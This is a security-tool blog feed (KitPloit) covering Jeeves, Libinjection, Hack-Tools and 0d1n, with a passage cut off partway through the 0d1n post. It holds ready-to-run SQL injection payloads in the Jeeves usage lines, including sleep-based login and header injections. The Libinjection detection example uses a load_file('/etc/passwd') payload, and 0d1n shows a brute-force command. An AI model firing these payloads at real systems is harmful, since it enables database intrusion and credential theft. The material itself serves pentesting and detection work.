tag:blogger.com,1999:blog-83172222311336605472024-03-19T08:30:32.443-03:00KitPloit - PenTest & Hacking ToolsKitPloit - leading source of Security Tools, Hacking Tools, CyberSecurity and Network Security ☣Unknownnoreply@blogger.comBlogger68125tag:blogger.com,1999:blog-8317222231133660547.post-39277488328870507342022-06-10T17:30:00.004-04:002022-06-10T17:30:00.258-04:00Jeeves - Time-Based Blind SQLInjection Finder<p style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEjwZ8dEQeF3stp-XvrZJ8rzWOoJ7mPB5N-FQFgsVhPdIC4EF5dpCLHNu3i2Cwo3lhI57zv8vanLAjhpmm06YjZspcRj4mZ9kUcw-6FiUfPKssIOyZigTwb_K_HtESqNyKyoZO_aFiVU_EGr9Q0WlY9yRRLwBGyGOMZi8ZHHJ0xawHTF8wRpkSbFCIyz"><img alt="" border="0" id="BLOGGER_PHOTO_ID_7105526880069218162" src="https://blogger.googleusercontent.com/img/a/AVvXsEjwZ8dEQeF3stp-XvrZJ8rzWOoJ7mPB5N-FQFgsVhPdIC4EF5dpCLHNu3i2Cwo3lhI57zv8vanLAjhpmm06YjZspcRj4mZ9kUcw-6FiUfPKssIOyZigTwb_K_HtESqNyKyoZO_aFiVU_EGr9Q0WlY9yRRLwBGyGOMZi8ZHHJ0xawHTF8wRpkSbFCIyz=s320" /></a></p><p><br /></p> <h3 align="center" dir="auto">Jeeves is made for finding Time-Based Blind SQL Injection during recon.</h3><span><a name='more'></a></span><div><br /></div> <h2 dir="auto">- Installation & Requirements:</h2> <p dir="auto">Installing Jeeves:</p><div></div> <div><pre><code>$ go install github.com/ferreiraklet/Jeeves@latest</code></pre></div> <p dir="auto">OR</p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="$ git clone https://github.com/ferreiraklet/Jeeves.git $ cd Jeeves $ go build jeeves.go $ chmod +x jeeves $ ./jeeves -h"><pre><code>$ git clone https://github.com/ferreiraklet/Jeeves.git<br />$ cd Jeeves<br />$ go build jeeves.go<br />$ chmod +x jeeves<br />$ ./jeeves -h</code></pre></div> <br /> <h2 dir="auto">- Usage & Explanation:</h2> <p dir="auto">In your recon process, you may find <a href="https://www.kitploit.com/search/label/Endpoints" target="_blank" 
title="endpoints">endpoints</a> that can be <a href="https://www.kitploit.com/search/label/Vulnerable" target="_blank" title="vulnerable">vulnerable</a> to SQL injection, e.g. <a href="https://redacted.com/index.php?id=1" rel="nofollow" target="_blank" title="https://redacted.com/index.php?id=1">https://redacted.com/index.php?id=1</a></p> <h3 dir="auto">Single URLs</h3> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="echo 'https://redacted.com/index.php?id=your_time_based_blind_payload_here' | jeeves -t payload_time echo "http://testphp.vulnweb.com/artists.php?artist=" | qsreplace "(select(0)from(select(sleep(5)))v)" | jeeves --payload-time 5 echo "http://testphp.vulnweb.com/artists.php?artist=" | qsreplace "(select(0)from(select(sleep(10)))v)" | jeeves -t 10"><pre><code>echo 'https://redacted.com/index.php?id=your_time_based_blind_payload_here' | jeeves -t payload_time<br />echo "http://testphp.vulnweb.com/artists.php?artist=" | qsreplace "(select(0)from(select(sleep(5)))v)" | jeeves --payload-time 5<br />echo "http://testphp.vulnweb.com/artists.php?artist=" | qsreplace "(select(0)from(select(sleep(10)))v)" | jeeves -t 10</code></pre></div> <p dir="auto">The value passed to <code>--payload-time</code> (<code>-t</code>) must match the sleep time used in the payload.</p> <br /> <h3 dir="auto">From a list</h3> <p dir="auto"><code>cat targets | jeeves --payload-time 5</code></p> <h3 dir="auto">Adding Headers</h3> <p dir="auto">Pay attention to the syntax! It must match the following (headers separated by <code>;</code>) =></p> <div><pre><code>echo "http://testphp.vulnweb.com/artists.php?artist=" | qsreplace "(select(0)from(select(sleep(5)))v)" | jeeves -t 5 -H "Testing: testing;OtherHeader: Value;Other2: Value"</code></pre></div> <h3 dir="auto">Using a proxy</h3> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="echo "http://testphp.vulnweb.com/artists.php?artist=" | qsreplace "(select(0)from(select(sleep(5)))v)" | jeeves -t 5 --proxy "http://ip:port" echo "http://testphp.vulnweb.com/artists.php?artist=" | qsreplace "(select(0)from(select(sleep(5)))v)" | jeeves -t 5 -p "http://ip:port""><pre><code>echo "http://testphp.vulnweb.com/artists.php?artist=" | qsreplace "(select(0)from(select(sleep(5)))v)" | jeeves -t 5 --proxy "http://ip:port"<br />echo "http://testphp.vulnweb.com/artists.php?artist=" | qsreplace "(select(0)from(select(sleep(5)))v)" | jeeves -t 5 -p "http://ip:port"</code></pre></div> <br /> <p dir="auto">Proxy + <a href="https://www.kitploit.com/search/label/Headers" target="_blank" title="Headers">Headers</a> =></p> <div><pre><code>echo "http://testphp.vulnweb.com/artists.php?artist=" | qsreplace "(select(0)from(select(sleep(5)))v)" | jeeves --payload-time 5 --proxy "http://ip:port" -H "User-Agent: xxxx"</code></pre></div> <h3 dir="auto">POST Request</h3> <p dir="auto">Sending data through a POST request (<a href="https://www.kitploit.com/search/label/Login" target="_blank" title="login">login</a> forms, etc.)</p> <p dir="auto">Pay attention to the syntax! It must match the following -></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="echo "https://example.com/Login.aspx" | jeeves -t 10 -d "user=(select(0)from(select(sleep(5)))v)&password=xxx" echo "https://example.com/Login.aspx" | jeeves -t 10 -H "Header1: Value1" -d "username=admin&password='+(select*from(select(sleep(5)))a)+'" -p "http://yourproxy:port""><pre><code>echo "https://example.com/Login.aspx" | jeeves -t 10 -d "user=(select(0)from(select(sleep(5)))v)&password=xxx"<br />echo "https://example.com/Login.aspx" | jeeves -t 10 -H "Header1: Value1" -d "username=admin&password='+(select*from(select(sleep(5)))a)+'" -p "http://yourproxy:port"</code></pre></div> <h2 dir="auto">Other ways of usage</h2> <p dir="auto">You can chain Jeeves with other tools, such as gau, gauplus, waybackurls, qsreplace and bhedak, to make the most of its strengths.</p> <br /> <p dir="auto"><strong>Command line flags</strong>:</p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content=" Usage: -t, --payload-time, The time from payload -p, --proxy Send traffic to a proxy -c Set Concurrency, Default 25 -H, --headers Custom Headers -d, --data Sending Post request with data -h Show This Help Message"><pre><code> Usage:<br /> -t, --payload-time, The time from payload<br /> -p, --proxy Send traffic to a proxy<br /> -c Set Concurrency, Default 25<br /> -H, --headers Custom Headers<br /> -d, --data Sending Post request with data<br /> -h Show This Help Message</code></pre></div> <br /> <p dir="auto">Using a SQL payload wordlist (the payload variable is quoted and read with <code>-r</code> so that spaces, backslashes and glob characters inside a payload survive the shell):</p> <div><pre><code>cat sql_wordlist.txt | while read -r payload; do echo "http://testphp.vulnweb.com/artists.php?artist=" | qsreplace "$payload" | jeeves -t 5; done</code></pre></div> <p dir="auto">Testing headers</p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="echo "https://target.com" | jeeves -H "User-Agent: 'XOR(if(now()=sysdate(),sleep(5*2),0))OR'" -t 10 echo "https://target.com" | jeeves -H "X-Forwarded-For: 'XOR(if(now()=sysdate(),sleep(5*2),0))OR'" -t 10"><pre><code>echo "https://target.com" | jeeves -H "User-Agent: 'XOR(if(now()=sysdate(),sleep(5*2),0))OR'" -t 10<br />echo "https://target.com" | jeeves -H "X-Forwarded-For: 'XOR(if(now()=sysdate(),sleep(5*2),0))OR'" -t 10</code></pre></div> <p dir="auto">Payload credit: https://github.com/rohit0x5</p> <p dir="auto">Notes:</p> <ul dir="auto"> <li>Jeeves does not follow redirects; if the status code is different from 200, it returns "Need Manual Analisys".</li> <li>Jeeves does not do HTTP probing; it cannot send requests to URLs that do not include a protocol (http://, https://).</li> </ul> <br /> <h2 dir="auto">This project is for educational and bug bounty purposes only! I do not support any illegal activities!</h2> <p dir="auto">If you find any error in the program, talk to me immediately.</p> <h2 dir="auto">Please, also check these => <br /></h2> <blockquote> <p dir="auto"><a href="https://github.com/ferreiraklet/nilo" rel="nofollow" target="_blank" title="Nilo">Nilo</a> - Checks if a URL has status 200</p> </blockquote> <blockquote> <p dir="auto"><a href="https://github.com/sqlmapproject/sqlmap" rel="nofollow" target="_blank" title="SQLMAP">SQLMAP</a></p> </blockquote> <blockquote> <p dir="auto"><a href="https://github.com/JohnTroony/Blisqy" rel="nofollow" target="_blank" title="Blisqy">Blisqy</a> - Header time-based SQLi</p> </blockquote> <br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/ferreiraklet/Jeeves" rel="nofollow" target="_blank" title="Download Jeeves">Download 
Jeeves</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-71984486434930539092021-06-10T08:30:00.006-04:002021-06-10T08:30:00.317-04:00Libinjection - SQL / SQLI Tokenizer Parser Analyzer<div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-W4TuZEsw8qs/YL1rYAxHFlI/AAAAAAAAZ8s/Qjo4jvaQaaM7K5iBhMxYB9JpNgMVka0rQCNcBGAsYHQ/s1003/sqli.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="425" data-original-width="1003" height="272" src="https://1.bp.blogspot.com/-W4TuZEsw8qs/YL1rYAxHFlI/AAAAAAAAZ8s/Qjo4jvaQaaM7K5iBhMxYB9JpNgMVka0rQCNcBGAsYHQ/w640-h272/sqli.png" width="640" /></a></div><p><br /></p> <p>SQL / SQLi tokenizer, parser and analyzer, for:</p> <ul> <li>C and C++</li> <li><a href="https://libinjection.client9.com/doc-sqli-php" rel="nofollow" target="_blank" title="PHP">PHP</a></li> <li><a href="https://libinjection.client9.com/doc-sqli-python" rel="nofollow" target="_blank" title="Python">Python</a></li> <li><a href="https://github.com/client9/libinjection/blob/master/lua" rel="nofollow" target="_blank" title="Lua">Lua</a></li> <li><a href="https://github.com/jeonglee/Libinjection" rel="nofollow" target="_blank" title="Java">Java</a> (external port)</li> <li><a href="https://github.com/p0pr0ck5/lua-ffi-libinjection" rel="nofollow" target="_blank" title="https://github.com/p0pr0ck5/lua-ffi-libinjection">LuaJIT/FFI</a> (external port)</li> </ul> <p>See <a href="https://www.client9.com/" rel="nofollow" target="_blank" title="https://www.client9.com/">https://www.client9.com/</a> for details and presentations.</p><span><a name='more'></a></span><p><br /></p> <p>Simple example (the input is checked against all quoting contexts because <code>FLAG_NONE</code> is passed; the process exit status is 1 when the input looks like SQLi and 0 otherwise):</p>
<div class="highlight highlight-source-c position-relative" data-snippet-clipboard-copy-content="#include <stdio.h> #include <string.h> #include "libinjection.h" #include "libinjection_sqli.h" int main(int argc, const char* argv[]) { struct libinjection_sqli_state state; int issqli; if (argc < 2) { fprintf(stderr, "usage: %s INPUT\n", argv[0]); return 0; } const char* input = argv[1]; size_t slen = strlen(input); /* in real-world, you would url-decode the input, etc */ /* FLAG_NONE lets libinjection try each quoting context itself */ libinjection_sqli_init(&state, input, slen, FLAG_NONE); issqli = libinjection_is_sqli(&state); if (issqli) { fprintf(stderr, "sqli detected with fingerprint of '%s'\n", state.fingerprint); } /* exit status 1 means the input looks like SQLi, 0 means clean */ return issqli; } "><pre><code>#include <stdio.h><br />#include <string.h>   /* strlen() lives in string.h, not strings.h */<br />#include "libinjection.h"<br />#include "libinjection_sqli.h"<br /><br />int main(int argc, const char* argv[])<br />{<br />    struct libinjection_sqli_state state;<br />    int issqli;<br /><br />    /* refuse to read argv[1] when no argument was given */<br />    if (argc < 2) {<br />        fprintf(stderr, "usage: %s INPUT\n", argv[0]);<br />        return 0;<br />    }<br />    const char* input = argv[1];<br />    size_t slen = strlen(input);<br /><br />    /* in real-world, you would url-decode the input, etc */<br /><br />    /* FLAG_NONE lets libinjection try each quoting context itself */<br />    libinjection_sqli_init(&state, input, slen, FLAG_NONE);<br />    issqli = libinjection_is_sqli(&state);<br />    if (issqli) {<br />        fprintf(stderr, "sqli detected with fingerprint of '%s'\n", state.fingerprint);<br />    }<br />    /* exit status 1 means the input looks like SQLi, 0 means clean */<br />    return issqli;<br />}</code></pre></div> <div class="snippet-clipboard-content position-relative" data-snippet-clipboard-copy-content="$ gcc -Wall -Wextra examples.c libinjection_sqli.c $ ./a.out "-1' and 1=1 union/* foo */select load_file('/etc/passwd')--" sqli detected with fingerprint of 's&1UE' "><pre><code>$ gcc -Wall -Wextra examples.c libinjection_sqli.c<br />$ ./a.out "-1' and 1=1 union/* foo */select load_file('/etc/passwd')--"<br />sqli detected with fingerprint of 's&1UE'<br /></code></pre></div> <p>More advanced samples:</p> <ul> <li><a href="https://github.com/client9/libinjection/blob/master/src/sqli_cli.c" rel="nofollow" target="_blank" title="sqli_cli.c">sqli_cli.c</a></li> <li><a href="https://github.com/client9/libinjection/blob/master/src/reader.c" rel="nofollow" target="_blank" 
title="reader.c">reader.c</a></li> <li><a href="https://github.com/client9/libinjection/blob/master/src/fptool.c" rel="nofollow" target="_blank" title="fptool">fptool</a></li> </ul> <br /><span style="font-size: large;"><b>VERSION INFORMATION</b></span><br /> <p>See <a href="https://github.com/client9/libinjection/blob/master/CHANGELOG" rel="nofollow" target="_blank" title="CHANGELOG">CHANGELOG</a> for details.</p> <p>Versions are listed as "major.minor.point".</p> <p>Major releases are significant changes to the API and/or fingerprint format. Applications will need recompiling and/or refactoring.</p> <p>Minor releases are C code changes. These may include:</p> <ul> <li>logical changes to what is detected or suppressed</li> <li>optimization changes</li> <li>code refactoring</li> </ul> <p>Point releases are purely data changes. These may be safely applied.</p> <br /><span style="font-size: large;"><b>QUALITY AND DIAGNOSTICS</b></span><br /> <p>The <a href="https://www.kitploit.com/search/label/Continuous%20Integration" target="_blank" title="continuous integration">continuous integration</a> results at <a href="https://travis-ci.org/client9/libinjection" rel="nofollow" target="_blank" title="https://travis-ci.org/client9/libinjection">https://travis-ci.org/client9/libinjection</a> test the following:</p> <ul class="contains-task-list"> <li class="task-list-item">build and unit tests under GCC</li> <li class="task-list-item">build and unit tests under Clang</li> <li class="task-list-item"><a href="https://www.kitploit.com/search/label/Static%20Analysis" target="_blank" title="static analysis">static analysis</a> using the <a href="http://clang-analyzer.llvm.org" rel="nofollow" target="_blank" title="clang static analyzer">clang static analyzer</a></li> <li class="task-list-item">static <a href="https://www.kitploit.com/search/label/Analysis" target="_blank" title="analysis">analysis</a> using <a href="https://github.com/danmar/cppcheck" rel="nofollow" target="_blank" title="cppcheck">cppcheck</a></li> 
<li class="task-list-item">checks for <a href="https://www.kitploit.com/search/label/Memory" target="_blank" title="memory">memory</a> errors using <a href="http://valgrind.org/" rel="nofollow" target="_blank" title="valgrind">valgrind</a></li> <li class="task-list-item">code coverage online using <a href="https://coveralls.io/github/client9/libinjection" rel="nofollow" target="_blank" title="coveralls.io">coveralls.io</a></li> </ul> <br /><span style="font-size: large;"><b>EMBEDDING</b></span><br /> <p>The <a href="https://github.com/client9/libinjection/tree/master/src" rel="nofollow" target="_blank" title="src">src</a> directory contains everything, but you only need to copy the following into your source tree:</p> <ul> <li><a href="https://github.com/client9/libinjection/blob/master/src/libinjection.h" rel="nofollow" target="_blank" title="src/libinjection.h">src/libinjection.h</a></li> <li><a href="https://github.com/client9/libinjection/blob/master/src/libinjection_sqli.c" rel="nofollow" target="_blank" title="src/libinjection_sqli.c">src/libinjection_sqli.c</a></li> <li><a href="https://github.com/client9/libinjection/blob/master/src/libinjection_sqli_data.h" rel="nofollow" target="_blank" title="src/libinjection_sqli_data.h">src/libinjection_sqli_data.h</a></li> <li><a href="https://github.com/client9/libinjection/blob/master/COPYING" rel="nofollow" target="_blank" title="COPYING">COPYING</a></li> </ul> <br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/client9/libinjection" rel="nofollow" target="_blank" title="Download Libinjection">Download Libinjection</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-27873165673281119812021-01-06T18:12:00.007-03:002021-01-06T18:12:41.044-03:00Hack-Tools v0.3.0 - The All-In-One Red Team Extension For Web Pentester<div class="separator" style="clear: both; text-align: center;"><a 
href="https://1.bp.blogspot.com/-QMFKQ1ABihI/X_YnN1ZGVSI/AAAAAAAAU4A/zvB_1WlIv6MNoxSEYJ93mj2gMD4-HlBawCNcBGAsYHQ/s1280/Hack-Tools_9.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="731" data-original-width="1280" height="366" src="https://1.bp.blogspot.com/-QMFKQ1ABihI/X_YnN1ZGVSI/AAAAAAAAU4A/zvB_1WlIv6MNoxSEYJ93mj2gMD4-HlBawCNcBGAsYHQ/w640-h366/Hack-Tools_9.png" width="640" /></a></div><p><br /></p><b>The all-in-one <a href="https://www.kitploit.com/search/label/Red%20Team" target="_blank" title="Red Team">Red Team</a> browser extension for <strong>Web Pentesters</strong></b><br /> <p>HackTools is a web extension that facilitates your <strong>web application penetration tests</strong>; it includes <strong>cheat sheets</strong> as well as all the <strong>tools</strong> used during a test, such as XSS payloads, reverse shells and much more.</p> <p>With the extension you <strong>no longer need to search for payloads on different websites</strong> or in your local storage space; most of the tools are accessible in one click. 
HackTools is accessible either in <strong>pop-up mode</strong> or in a whole tab in the <strong>Devtools</strong> part of the browser (F12).</p><span><a name='more'></a></span><div><br /></div><b>Current functions</b><br /> <ul> <li>Dynamic Reverse Shell generator (PHP, Bash, Ruby, Python, Perl, Netcat)</li> <li>Shell Spawning (TTY Shell Spawning)</li> <li>XSS Payloads</li> <li>Basic SQLi payloads</li> <li>Local file inclusion payloads (LFI)</li> <li>Base64 Encoder / Decoder</li> <li>Hash <a href="https://www.kitploit.com/search/label/Generator" target="_blank" title="Generator">Generator</a> (MD5, SHA1, SHA256, SHA512, SM3)</li> <li>Useful Linux commands (Port Forwarding, SUID)</li> <li>RSS Feed (Exploit DB, Cisco Security Advisories, CXSECURITY)</li> <li>CVE Search Engine</li> <li>Various methods of data <a href="https://www.kitploit.com/search/label/Exfiltration" target="_blank" title="exfiltration">exfiltration</a> and download from a remote machine</li> </ul> <br /><span style="font-size: large;"><b>Preview</b></span><br /> <div><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-Dx8e84ksU20/X_YnWg19MQI/AAAAAAAAU4I/aQlNFzriOiAY0mailVCY3m6iRnHTCm1SACNcBGAsYHQ/s1309/Hack-Tools_10.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="799" data-original-width="1309" height="390" src="https://1.bp.blogspot.com/-Dx8e84ksU20/X_YnWg19MQI/AAAAAAAAU4I/aQlNFzriOiAY0mailVCY3m6iRnHTCm1SACNcBGAsYHQ/w640-h390/Hack-Tools_10.png" width="640" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-X-Arj_BzAwQ/X_YnWtGLLOI/AAAAAAAAU4E/OjNoVvyxfGgEQQnIK-cXN9tS1HoFm5X7wCNcBGAsYHQ/s1309/Hack-Tools_11.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="799" data-original-width="1309" height="390" 
src="https://1.bp.blogspot.com/-X-Arj_BzAwQ/X_YnWtGLLOI/AAAAAAAAU4E/OjNoVvyxfGgEQQnIK-cXN9tS1HoFm5X7wCNcBGAsYHQ/w640-h390/Hack-Tools_11.png" width="640" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-3Gel9RO5i_c/X_YnWik7I9I/AAAAAAAAU4M/9soNCKAWXcsxErgQ9w45DY92hBqBP-VWwCNcBGAsYHQ/s1309/Hack-Tools_12.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="799" data-original-width="1309" height="390" src="https://1.bp.blogspot.com/-3Gel9RO5i_c/X_YnWik7I9I/AAAAAAAAU4M/9soNCKAWXcsxErgQ9w45DY92hBqBP-VWwCNcBGAsYHQ/w640-h390/Hack-Tools_12.png" width="640" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-SxnQ20-yeMI/X_YnXLEjQLI/AAAAAAAAU4Q/uyJbCYO6VXMadbRtNTAfRjGooDauOE79gCNcBGAsYHQ/s1309/Hack-Tools_13.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="799" data-original-width="1309" height="390" src="https://1.bp.blogspot.com/-SxnQ20-yeMI/X_YnXLEjQLI/AAAAAAAAU4Q/uyJbCYO6VXMadbRtNTAfRjGooDauOE79gCNcBGAsYHQ/w640-h390/Hack-Tools_13.png" width="640" /></a></div><br /><div><br /></div> <br /><span style="font-size: x-large;"><b>Install the extension</b></span><br /> <br /><b>Chromium-based browser</b><br /> <p>You can download the <strong>latest build</strong> <a href="https://github.com/LasCC/Hack-Tools/releases" rel="nofollow" target="_blank" title="here.">here.</a></p> <p>Or, you can download the extension from the <strong>Chrome Web Store</strong> <a href="https://chrome.google.com/webstore/detail/hack-tools/cmbndhnoonmghfofefkcccljbkdpamhi" rel="nofollow" target="_blank" title="there.">there.</a></p> <p>Otherwise, if you want to build the project yourself from the source code, follow the "Build from source code" steps below.</p> <br /><b>Mozilla Firefox</b><br /> <p>You can download <strong>HackTools</strong> from the Firefox browser <a href="https://www.kitploit.com/search/label/Add-ons" 
target="_blank" title="add-ons">add-ons</a> <a href="https://addons.mozilla.org/en-US/firefox/addon/hacktools/" rel="nofollow" target="_blank" title="here.">here.</a></p> <br /><b>Build from source code</b><br /> <div><pre><code>yarn install && yarn build</code></pre></div> <p>Once the build has completed correctly, webpack will create a new folder called <strong>dist</strong>.</p> <p>After that you need to go to the <strong>extensions</strong> tab of your Chromium-based browser and turn on <strong>developer mode</strong>.</p> <p><br /></p><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-GtAkilc2MD0/X_YneUp03zI/AAAAAAAAU4Y/uX-Cm3vN4_keBO7angjtAl4wpnewqqD9ACNcBGAsYHQ/s287/Hack-Tools_14.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="130" data-original-width="287" height="290" src="https://1.bp.blogspot.com/-GtAkilc2MD0/X_YneUp03zI/AAAAAAAAU4Y/uX-Cm3vN4_keBO7angjtAl4wpnewqqD9ACNcBGAsYHQ/w640-h290/Hack-Tools_14.png" width="640" /></a></div><p><br /></p> <p>Then click on the <strong>load unpacked</strong> button in the top left corner.</p> <p><br /></p><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-rUDN-3sy5cM/X_YniP2AAJI/AAAAAAAAU4c/4pp-3Fs5aishoiW-1uEpBz9aj1gLao5qwCNcBGAsYHQ/s563/Hack-Tools_15.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="125" data-original-width="563" height="142" src="https://1.bp.blogspot.com/-rUDN-3sy5cM/X_YniP2AAJI/AAAAAAAAU4c/4pp-3Fs5aishoiW-1uEpBz9aj1gLao5qwCNcBGAsYHQ/w640-h142/Hack-Tools_15.png" width="640" /></a></div><p><br /></p> <p>Once you have clicked the button, you just need to select the <strong>dist folder</strong> and that's it! 
</p><div></div> <div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-YFuYevct3N0/X_YnoDOrycI/AAAAAAAAU4o/y4gwew1clH8hXmQcnzURHSwDmx94-9cWwCNcBGAsYHQ/s802/Hack-Tools_16.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="455" data-original-width="802" height="364" src="https://1.bp.blogspot.com/-YFuYevct3N0/X_YnoDOrycI/AAAAAAAAU4o/y4gwew1clH8hXmQcnzURHSwDmx94-9cWwCNcBGAsYHQ/w640-h364/Hack-Tools_16.png" width="640" /></a></div><p><br /></p><span style="font-size: large;"><b>Authors</b></span><br /> <p></p><div></div> <strong>Ludovic COULON & Riadh BOUCHAHOUA</strong> <br /><p><br /></p><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/LasCC/Hack-Tools" rel="nofollow" target="_blank" title="Download Hack-Tools">Download Hack-Tools</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-71103475561679305622020-12-22T08:30:00.001-03:002020-12-22T08:30:08.070-03:000D1N v3.4 - Tool For Automating Customized Attacks Against Web Applications (Full Made In C Language With Pthreads, Have A Fast Performance)<div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-ehW_OJoFVtM/X-F9pZEWFZI/AAAAAAAAUtg/Y1ZE5FQcZYAiXJBKovOOrrLXyNLGj30YACNcBGAsYHQ/s972/0d1n_1_overview1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="616" data-original-width="972" height="406" src="https://1.bp.blogspot.com/-ehW_OJoFVtM/X-F9pZEWFZI/AAAAAAAAUtg/Y1ZE5FQcZYAiXJBKovOOrrLXyNLGj30YACNcBGAsYHQ/w640-h406/0d1n_1_overview1.png" width="640" /></a></div><p><br /></p> <p>0d1n is a tool for automating customized attacks against web applications. 
This tool is very fast because it uses a thread pool and is written in C.</p><span><a name='more'></a></span><p><br /></p><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-7VgP3PRXfac/X-F9vgpsWMI/AAAAAAAAUto/102E38V61ekLhVtjwo2R7ipRlcGuB0b1gCNcBGAsYHQ/s951/0d1n_2_tables.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="732" data-original-width="951" height="492" src="https://1.bp.blogspot.com/-7VgP3PRXfac/X-F9vgpsWMI/AAAAAAAAUto/102E38V61ekLhVtjwo2R7ipRlcGuB0b1gCNcBGAsYHQ/w640-h492/0d1n_2_tables.png" width="640" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-icpCqWjAZTI/X-F9vjAdFwI/AAAAAAAAUtk/fDHLBuFwzvUKcAWaci8C3179ILiHkSGWgCNcBGAsYHQ/s957/0d1n_3_datatables.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="485" data-original-width="957" height="324" src="https://1.bp.blogspot.com/-icpCqWjAZTI/X-F9vjAdFwI/AAAAAAAAUtk/fDHLBuFwzvUKcAWaci8C3179ILiHkSGWgCNcBGAsYHQ/w640-h324/0d1n_3_datatables.png" width="640" /></a></div><p><br /></p><p>
Video demo:</p><p><br /></p><p style="text-align: center;"><iframe allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture" allowfullscreen="" frameborder="0" height="315" src="https://www.youtube.com/embed/1L22mbbVge0" width="560"></iframe></p> <br /><span style="font-size: large;"><b>Tool functions:</b></span><br /> <ul> <li> <p>Brute force logins and <a href="https://www.kitploit.com/search/label/Passwords" target="_blank" title="passwords">passwords</a> in auth forms</p> </li> <li> <p>Directory disclosure (use a PATH list to brute force, and find the HTTP status code)</p> </li> <li> <p>Test to find SQL <a href="https://www.kitploit.com/search/label/Injection" target="_blank" title="Injection">Injection</a> and XSS vulnerabilities</p> </li> <li> <p>Test to find SSRF</p> </li> <li> <p>Test to find command injection</p> </li> <li> <p>Option to load an anti-CSRF token on each request</p> </li> <li> <p>Option to use a random proxy per request</p> </li> <li> <p>other functions...</p> </li> </ul> <br /><span style="font-size: large;"><b>To run and install, follow these steps:</b></span><br /> <p>Requires libcurl-dev (or libcurl-devel on RPM-based Linux).</p> <pre><code>$ git clone https://github.com/CoolerVoid/0d1n/</code></pre> <p>You need libcurl to run; see the following to install it:</p> <pre><code>$ sudo apt-get install libcurl-dev<br />or try libcurl4-dev... 
libcurl*<br /><br />if rpm distro<br /><br />$ sudo yum install libcurl-devel<br /></code></pre> <p>To install, run these commands:</p> <pre><code>$ cd 0d1n<br /><br />$ make; sudo make install USER=name_your_user; <br /><br />$ cd 0d1n_view; make; sudo make install USER=name_your_user; <br /></code></pre> <p>Start the view server to look at the reports online:</p> <pre><code>$ sudo 0d1n_view <br /><br /></code></pre> <p>Now in another <a href="https://www.kitploit.com/search/label/Console" target="_blank" title="console">console</a> you can run the tool:</p> <pre><code><br />$ 0d1n<br /><br /></code></pre> <br /><span style="font-size: large;"><b>To uninstall, follow these steps:</b></span><br /> <pre><code>$ cd 0d1n; sudo make uninstall<br /><br />$ cd 0d1n_view; sudo make uninstall<br /><br /></code></pre> <br /><span style="font-size: large;"><b>Attack examples:</b></span><br /> <p>Brute force to find directories (the <code>^</code> marks where each payload is inserted):</p> <pre><code>$ 0d1n --host http://127.0.0.1/^ --payloads /opt/0d1n/payloads/dir_brute.txt --threads 500 --timeout 3 --log bartsimpsom4 --save_response<br /></code></pre> <p>Note: you can change the number of threads; if you have a good machine, you can try 800 or 1200... 
